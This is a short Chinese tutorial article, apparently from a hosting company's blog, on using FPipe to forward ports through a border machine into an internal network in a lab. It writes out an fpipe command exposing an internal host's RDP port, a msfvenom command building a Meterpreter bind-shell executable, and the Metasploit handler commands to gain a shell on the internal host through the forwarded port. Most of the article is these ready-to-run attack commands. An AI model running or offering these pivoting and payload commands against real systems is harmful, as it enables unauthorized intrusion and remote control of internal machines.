这篇文章给大家介绍如何理解FPipe端口转发,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
注:
边界机器 win08 192.168.222.175
内网机器 win7 192.168.222.137
msf机器 Ubuntu 192.168.222.177
0x01 FPipe介绍
FPipe即forward pipe,在两个端口中间建立一个管道,来实现流量的转发,一般用于内网机器不能正常上网的情况,而且不需要考虑免杀,但是必须要有边界机器,它不仅支持TCP流量的转发,还支持UDP的。
0x02 端口转发
将来自外部53端口的流量,通过本地的53端口转发到内网的3389端口
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 3389 192.168.222.137
然后回到本地来远程连接就可以了
0x03 msf正向上线
这里我们使用bind型的payload,保证让无法正常上网的内网主机也能正常反弹shell
正常生成一个马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
之后去边界机器执行转发
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 53 192.168.222.137
在内网机器上运行我们的马
回到Ubuntu上进行监听
use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 53set rhost 192.168.222.175run
这里的Died是生成的马有问题,之后换一下payload就可以搞定了,这个不必在意
根据实际情况来进行使用就ok了
关于如何理解FPipe端口转发就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。